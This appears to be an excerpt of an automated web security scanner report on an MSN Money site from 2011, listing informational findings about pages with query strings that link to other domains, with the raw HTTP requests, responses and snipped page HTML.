http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=How+can+i+budget+to+save&go=&form=money3
http://www.bing.com/search?q=How+much+annual+pay+should+I+be+saving&form=money3
http://www.bing.com/search?q=I+want+to+retire+at+50+how+much+money+do+I+need&form=money3
http://www.bing.com/search?q=Should+an+adult+have+an+allowance&form=money3
http://www.bing.com/search?q=What+is+the+difference+between+a+credit+union+and+a+bank&form=money3
http://www.bing.com/search?q=What+is+the+secret+to+saving+money&form=money3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344888&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fsaving-money%2F50-30-20-budget.aspx%3FGT1%3D33001&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

GET /saving-money/50-30-20-budget.aspx?GT1=33001 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=bffcebe3a61d44229031c1bc65653d0a; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:48:07 GMT
Content-Length: 33120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344888&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fsaving-money%2F50-30-20-budget.aspx%3FGT1%3D33001&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<area href="http://money.msn.com/saving-money/video.aspx" alt="Your Money - Strategies for saving more" shape="rect" coords="15,1,263,72" /><area href="http://learn.bankofamerica.com/" alt="Sponsored by Bank of America" shape="rect" coords="833,20,977,50" /><area href="http://lifestyle.redacted/your-life/your-money-today/" alt="MSN Lifestyle" shape="rect" coords="805,60,865,80" />
...[SNIP]...
<div class="br br1"><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d853029/9/859689/randm.js"></script>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=What+is+the+secret+to+saving+money&form=money3">What is the secret to saving money?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+much+annual+pay+should+I+be+saving&form=money3">How much of my pay should I save?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=I+want+to+retire+at+50+how+much+money+do+I+need&form=money3">I want to retire at 50. How much do I need?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+can+i+budget+to+save&go=&form=money3">How can I budget to save money?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+is+the+difference+between+a+credit+union+and+a+bank&form=money3">How is a credit union different from a bank?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=Should+an+adult+have+an+allowance&form=money3">Should an adult have an allowance?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.211. http://money.redacted/saving-money/50-30-20-budget.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/saving-money/50-30-20-budget.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/saving-money/50-30-20-budget.aspx?GT1=33001

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://amch.questionmarket.com/adsc/d853029/9/859689/randm.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://learn.bankofamerica.com/
http://mail.live.com/
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=How+can+i+budget+to+save&go=&form=money3
http://www.bing.com/search?q=How+much+annual+pay+should+I+be+saving&form=money3
http://www.bing.com/search?q=I+want+to+retire+at+50+how+much+money+do+I+need&form=money3
http://www.bing.com/search?q=Should+an+adult+have+an+allowance&form=money3
http://www.bing.com/search?q=What+is+the+difference+between+a+credit+union+and+a+bank&form=money3
http://www.bing.com/search?q=What+is+the+secret+to+saving+money&form=money3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406270&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fsaving-money%2F50-30-20-budget.aspx%3FGT1%3D33001&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

GET /saving-money/50-30-20-budget.aspx?GT1=33001 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=3fdf5153d87c4b50af336b1575203d66; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 16:51:09 GMT
Content-Length: 33120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406270&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fsaving-money%2F50-30-20-budget.aspx%3FGT1%3D33001&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<area href="http://money.msn.com/saving-money/video.aspx" alt="Your Money - Strategies for saving more" shape="rect" coords="15,1,263,72" /><area href="http://learn.bankofamerica.com/" alt="Sponsored by Bank of America" shape="rect" coords="833,20,977,50" /><area href="http://lifestyle.redacted/your-life/your-money-today/" alt="MSN Lifestyle" shape="rect" coords="805,60,865,80" />
...[SNIP]...
<div class="br br1"><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d853029/9/859689/randm.js"></script>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=What+is+the+secret+to+saving+money&form=money3">What is the secret to saving money?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+much+annual+pay+should+I+be+saving&form=money3">How much of my pay should I save?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=I+want+to+retire+at+50+how+much+money+do+I+need&form=money3">I want to retire at 50. How much do I need?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+can+i+budget+to+save&go=&form=money3">How can I budget to save money?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+is+the+difference+between+a+credit+union+and+a+bank&form=money3">How is a credit union different from a bank?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=Should+an+adult+have+an+allowance&form=money3">Should an adult have an allowance?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.212. http://money.redacted/top-stocks/post.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/top-stocks/post.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/top-stocks/post.aspx?post=2150c69c-d2a4-4ab3-821b-4697128c6c1e

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://bigpicture.typepad.com/
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://confusedcapitalist.blogspot.com/
http://dealbook.blogs.nytimes.com/
http://delong.typepad.com/sdj/index_heavy.html
http://explore.live.com/windows-live-messenger
http://finance.fortune.cnn.com/2011/01/26/exclusive-elevations-bodnick-is-headed-to-quora/?section=magazines_fortune
http://freakonomics.blogs.nytimes.com/
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0763-0000-0000-000000000000_20110128204040_Bono_012811_AP_164.jpg
http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://norris.blogs.nytimes.com/?ref=business
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://seekingalpha.com/
http://techcrunch.com/2010/03/28/quora-has-the-magic-benchmark-invests-at-86-million-valuation/
http://www.247wallst.com/
http://www.alleyinsider.com/
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=cars+with+highest+resale+value&form=MONEY3
http://www.bing.com/search?q=history+of+the+gold+standard&form=MONEY3
http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&form=MONEY3
http://www.bing.com/search?q=how+to+file+income+taxes+electronically&form=MONEY3
http://www.bing.com/search?q=smart+phones+ID+theft&form=MONEY3
http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&form=MONEY3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.businessinsider.com/a-nasty-battle-over-money-is-breaking-up-bonos-silicon-valley-private-equity-firm-elevation-partners-2011-1
http://www.cannex.com/
http://www.dailyspeculations.com/wordpress/
http://www.dealbreaker.com/
http://www.delish.com/
http://www.digstock.com/blogdigg.php
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.howardlindzon.com/
http://www.huffingtonpost.com/business/
http://www.interactivedata-rts.com/
http://www.kudlowsmoneypolitics.blogspot.com/
http://www.mercurynews.com/business/ci_17039439?nclick_check=1
http://www.moneytalksnews.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.portfolio.com/views/blogs/market-movers/2008/09/20/hank-paulson-buy-sider
http://www.prospect.org/csnc/blogs/beat_the_press
http://www.reuters.com/
http://www.rgemonitor.com/blog/roubini
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.slate.com/id/2282620?ocid=xnetr2-4
http://www.thedisciplinedinvestor.com/
http://www.tickersense.typepad.com/
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353548&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Ftop-stocks%2Fpost.aspx%3Fpost%3D2150c69c-d2a4-4ab3-821b-4697128c6c1e&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

GET /top-stocks/post.aspx?post=2150c69c-d2a4-4ab3-821b-4697128c6c1e HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:12:28 GMT
Content-Length: 69148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353548&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Ftop-stocks%2Fpost.aspx%3Fpost%3D2150c69c-d2a4-4ab3-821b-4697128c6c1e&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<div class="pst_bod" id="abody"><img src="http://media.social.s-redacted/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0763-0000-0000-000000000000_20110128204040_Bono_012811_AP_164.jpg" alt="Credit: (© Virginia Mayo/AP)
Caption: Bono" class="imagefloatleft userImage lead" />Bono hasn't had the best go as a technology investor. His private-equity firm, Elevation Partners, lost some geek cred after plowing $460 million into failed device maker Palm.<br />
...[SNIP]...
<br />Such is the rocky life of a big-risk, big-reward private equity firm. But the U2 frontman's company may face its toughest hurdle yet, now that a co-founder has decided to leave. <a href="http://finance.fortune.cnn.com/2011/01/26/exclusive-elevations-bodnick-is-headed-to-quora/?section=magazines_fortune" title="http://finance.fortune.cnn.com/2011/01/26/exclusive-elevations-bodnick-is-headed-to-quora/?section=magazines_fortune">Fortune reports</a> that Marc Bodnick is resigning as co-founding partner at Elevation for a position at Quora, an online question-and-answer site <a href="http://techcrunch.com/2010/03/28/quora-has-the-magic-benchmark-invests-at-86-million-valuation/" title="http://techcrunch.com/2010/03/28/quora-has-the-magic-benchmark-invests-at-86-million-valuation/">valued last year</a>
...[SNIP]...
<br />His departure is damaging enough for Elevation. But <a href="http://www.businessinsider.com/a-nasty-battle-over-money-is-breaking-up-bonos-silicon-valley-private-equity-firm-elevation-partners-2011-1" title="http://www.businessinsider.com/a-nasty-battle-over-money-is-breaking-up-bonos-silicon-valley-private-equity-firm-elevation-partners-2011-1">today brings word</a>
...[SNIP]...
 The feud was simmering in private, <a href="http://www.businessinsider.com/a-nasty-battle-over-money-is-breaking-up-bonos-silicon-valley-private-equity-firm-elevation-partners-2011-1" title="http://www.businessinsider.com/a-nasty-battle-over-money-is-breaking-up-bonos-silicon-valley-private-equity-firm-elevation-partners-2011-1">The Daily Beast reports</a>
...[SNIP]...
<br />In 2007, all three partners made personal investments in Facebook by buying large chunks of stock from employees, <a href="http://www.mercurynews.com/business/ci_17039439?nclick_check=1" title="http://www.mercurynews.com/business/ci_17039439?nclick_check=1">The San Jose Mercury-News reports</a>
...[SNIP]...
rlBinary', 'True','1');" href="http://money.msn.com/top-stocks/post.aspx?post=2150c69c-d2a4-4ab3-821b-4697128c6c1e&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
ry', 'True','0');" href="http://money.msn.com/top-stocks/post.aspx?post=2150c69c-d2a4-4ab3-821b-4697128c6c1e&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://www.247wallst.com/" class="opennew">24/7 Wall Street</a>
...[SNIP]...
<li><a href="http://confusedcapitalist.blogspot.com/" class="opennew">The Confused Capitalist</a>
...[SNIP]...
<li><a href="http://dealbook.blogs.nytimes.com/">DealBook</a></li><li><a href="http://www.dealbreaker.com/" class="opennew">DealBreaker.com</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/business/" class="opennew">Huffington Post Business</a>
...[SNIP]...
<li><a href="http://www.rgemonitor.com/blog/roubini" class="opennew">Nouriel Roubini's blog</a>
...[SNIP]...
<li><a href="http://seekingalpha.com/" class="opennew">Seeking Alpha</a>
...[SNIP]...
<li><a href="http://bigpicture.typepad.com/" class="opennew">The Big Picture</a>
...[SNIP]...
<li><a href="http://norris.blogs.nytimes.com/?ref=business" class="opennew">Floyd Norris: Notions on High and Low Finance</a>
...[SNIP]...
<li><a href="http://www.dailyspeculations.com/wordpress/" class="opennew">Daily Speculations</a>
...[SNIP]...
<li><a href="http://www.tickersense.typepad.com/" class="opennew">Ticker Sense</a>
...[SNIP]...
<li><a href="http://freakonomics.blogs.nytimes.com/" class="opennew">Freakonomics</a>
...[SNIP]...
<li><a href="http://www.prospect.org/csnc/blogs/beat_the_press" class="opennew">Beat the Press</a>
...[SNIP]...
<li><a href="http://www.kudlowsmoneypolitics.blogspot.com/" class="opennew">Kudlow's Money Politic$</a>
...[SNIP]...
<li><a href="http://www.moneytalksnews.com/" class="opennew">Money Talks News</a>
...[SNIP]...
<li><a href="http://delong.typepad.com/sdj/index_heavy.html" class="opennew">Brad DeLong's Semi-Daily Journal</a>
...[SNIP]...
<li><a href="http://www.digstock.com/blogdigg.php" class="opennew">DigStock Dig Blog</a>
...[SNIP]...
<li><a href="http://www.alleyinsider.com/" class="opennew">Silicon Alley Insider</a>
...[SNIP]...
<li><a href="http://www.thedisciplinedinvestor.com/" class="opennew">The Disciplined Investor</a>
...[SNIP]...
<li><a href="http://www.howardlindzon.com/" class="opennew">Howard Lindzon</a>
...[SNIP]...
<li class="last"><a href="http://www.portfolio.com/views/blogs/market-movers/2008/09/20/hank-paulson-buy-sider" class="opennew">Market Movers</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+to+file+income+taxes+electronically&form=MONEY3" class="opennew">How to file your taxes electronically</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=smart+phones+ID+theft&form=MONEY3" class="opennew">Is your smart phone safe from ID thieves?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=cars+with+highest+resale+value&form=MONEY3" class="opennew">Cars with the highest resale value</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&form=MONEY3" class="opennew">Surprising things home insurance doesn't cover</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&form=MONEY3" class="opennew">How to convert a traditional IRA to a Roth</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=history+of+the+gold+standard&form=MONEY3" class="opennew">The history of the gold standard</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.213. http://money.redacted/top-stocks/post.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/top-stocks/post.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/top-stocks/post.aspx?post=2150c69c-d2a4-4ab3-821b-4697128c6c1e

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://bigpicture.typepad.com/
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://confusedcapitalist.blogspot.com/
http://dealbook.blogs.nytimes.com/
http://delong.typepad.com/sdj/index_heavy.html
http://explore.live.com/windows-live-messenger
http://finance.fortune.cnn.com/2011/01/26/exclusive-elevations-bodnick-is-headed-to-quora/?section=magazines_fortune
http://freakonomics.blogs.nytimes.com/
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0763-0000-0000-000000000000_20110128204040_Bono_012811_AP_164.jpg
http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
